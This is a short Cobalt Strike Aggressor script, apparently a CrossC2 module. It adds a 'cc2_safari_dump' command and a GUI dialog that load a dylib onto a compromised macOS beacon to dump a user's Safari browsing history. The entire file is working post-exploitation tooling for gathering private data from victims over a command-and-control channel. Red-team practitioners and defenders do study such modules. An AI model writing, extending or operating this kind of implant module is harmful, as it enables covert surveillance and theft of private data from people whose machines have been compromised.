
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_safari_dump {
    blog($1, "\nUsage: cc2_safari_dump <username> <dump count>\n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100");
}

sub cc2_safari_dump {
    $taskName = "cc2_safari_dump"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # keystrokes -> keylogger message

    $beaconid = $1;
    $username = $2;
    $queryCount = $3;
    $transportArg = $username."^".$queryCount;

    if ($username && $queryCount) {
        $loadlib = "gather/browser/cc2_safari_dump.dylib";
        blog($beaconid, "cc2_safari_dump: ");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_safari_dump($beaconid);
    }

}

ssh_alias("cc2_safari_dump", &cc2_safari_dump);

ssh_command_register("cc2_safari_dump", "CrossC2 safari dump - dump browser history from Safari(default 500).", "\nUsage: cc2_safari_dump <username> <dump count>\n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100");


sub openSafariDialogCallBack {
    $bid = $3['bid'];
    $username = $3['d_username'];
    $queryCount = $3['d_count'];
    binput($bid, "cc2_safari_dump $username $queryCount");
    cc2_safari_dump($bid, $username, $queryCount);
}

sub openSafariDialog {
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("Safari Dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openSafariDialogCallBack);
    dialog_description($dialog, "dump browser history from Safari");

    drow_text($dialog, "d_username", "username: ", 20); 
    drow_text($dialog, "d_count", "history count: ", 20);

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}


sub cc2_safari_dump_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}